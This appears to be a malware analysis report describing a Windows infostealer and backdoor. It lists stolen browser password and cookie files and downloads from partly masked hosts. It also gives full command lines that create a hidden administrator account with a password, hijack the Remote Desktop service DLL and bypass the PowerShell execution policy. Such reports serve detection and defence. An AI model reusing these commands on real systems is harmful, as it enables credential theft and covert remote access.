Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%ProgramFiles%\windows mail\appcache.xml'
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Malicious functions
Executes the following
- '%WINDIR%\syswow64\taskkill.exe' /im <File name>.exe /f
Terminates or attempts to terminate
the following user processes:
- firefox.exe
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %APPDATA%\opera software\opera stable\login data
Modifies file system
Creates the following files
- %PROGRAMDATA%\freebl3.dll
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\telegram\d877f783d5d3ef8c1
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\telegram\map0
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookie_list.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\information.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\files\default1.zip
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\screenshot.jpg
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\nl_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee3162852871.zip
- %PROGRAMDATA%\9j7pam5ltq.exe
- %TEMP%\nsl8b76.tmp
- %TEMP%\nsb8b87.tmp\blowfish.dll
- %TEMP%\chadshfsd323.txt
- %TEMP%\premiumextraxeeoulzcjz.ps1
- %TEMP%\add.ps1
- %TEMP%\nsb8b87.tmp\system.dll
- %ProgramFiles%\windows mail\appcache.xml
- %ProgramFiles%\windows mail\default_list.xml
- %ProgramFiles%\windows mail\cleanuptask.cfg
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- <SYSTEM32>\rfxvmt.dll
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\mozglue.dll
- %PROGRAMDATA%\msvcp140.dll
- %PROGRAMDATA%\nss3.dll
- %PROGRAMDATA%\softokn3.dll
- %PROGRAMDATA%\vcruntime140.dll
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\c
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\c-shm
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\cookies_mozilla firefox_gn7ryp3k.default.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\history
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\history-shm
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\history\history_mozilla firefox_gn7ryp3k.default.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\ld
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\historych
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\google chrome_default.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\wd
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\history\opera_stable.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\opera_stable.txt
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %WINDIR%\temp\usrnm.txt
Deletes the following files
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\c-shm
- %TEMP%\nsb8b87.tmp\system.dll
- %TEMP%\nsb8b87.tmp\blowfish.dll
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\nl_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee3162852871.zip
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\telegram\map0
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\telegram\d877f783d5d3ef8c1
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\screenshot.jpg
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\information.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\history\opera_stable.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\history\history_mozilla firefox_gn7ryp3k.default.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\files\default1.zip
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookie_list.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\opera_stable.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\google chrome_default.txt
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\files\cookies\cookies_mozilla firefox_gn7ryp3k.default.txt
- %PROGRAMDATA%\vcruntime140.dll
- %PROGRAMDATA%\softokn3.dll
- %PROGRAMDATA%\nss3.dll
- %PROGRAMDATA%\msvcp140.dll
- %PROGRAMDATA%\mozglue.dll
- %PROGRAMDATA%\freebl3.dll
- %PROGRAMDATA%\yryqfuj1af82gtgp2yoyp1nbb\history-shm
- %PROGRAMDATA%\9j7pam5ltq.exe
- %TEMP%\chadshfsd323.txt
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://qu##rt.org/freebl3.dll
- http://qu##rt.org/mozglue.dll
- http://qu##rt.org/msvcp140.dll
- http://qu##rt.org/nss3.dll
- http://qu##rt.org/softokn3.dll
- http://qu##rt.org/vcruntime140.dll
- http://ip###ger.org/fkJJ
- http://cv##.icu/svddigjgj5.exe
UDP
- DNS ASK qu##rt.org
- DNS ASK ip##pi.com
- DNS ASK ip###ger.org
- DNS ASK cv##.icu
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Creates and executes the following
- '%PROGRAMDATA%\9j7pam5ltq.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\premiumextraXEEOULZCJZ.ps1
- '%PROGRAMDATA%\9j7pam5ltq.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im <File name>.exe /f & erase <Full path to file> & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraXEEOULZCJZ.ps1' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc Ghasar4f5 /del' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 61GL1PoI /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" rxvkyzrm$ /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 61GL1PoI' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im <File name>.exe /f & erase <Full path to file> & exit
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc Ghasar4f5 /del
- '<SYSTEM32>\net.exe' user WgaUtilAcc Ghasar4f5 /del
- '<SYSTEM32>\net1.exe' user WgaUtilAcc Ghasar4f5 /del
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 61GL1PoI /add
- '<SYSTEM32>\net.exe' user WgaUtilAcc 61GL1PoI /add
- '<SYSTEM32>\net1.exe' user WgaUtilAcc 61GL1PoI /add
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" rxvkyzrm$ /ADD
- '<SYSTEM32>\net.exe' user WgaUtilAcc 61GL1PoI
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" rxvkyzrm$ /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" rxvkyzrm$ /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 61GL1PoI
- '<SYSTEM32>\net1.exe' start TermService
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\net.exe' start TermService
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraXEEOULZCJZ.ps1
- '<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
- '<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- '<SYSTEM32>\cmd.exe' /c cmd/c net start TermService
- '<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "%ProgramFiles%\windows mail\appcache.xml" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
- '<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\cmd.exe' /c cmd/c net start rdpdr
- '<SYSTEM32>\cmd.exe' /c net start rdpdr
- '<SYSTEM32>\net.exe' start rdpdr
- '<SYSTEM32>\net1.exe' start rdpdr
- '<SYSTEM32>\cmd.exe' /c net start TermService
- '<SYSTEM32>\net1.exe' user WgaUtilAcc 61GL1PoI
Uses NTFS alternate data streams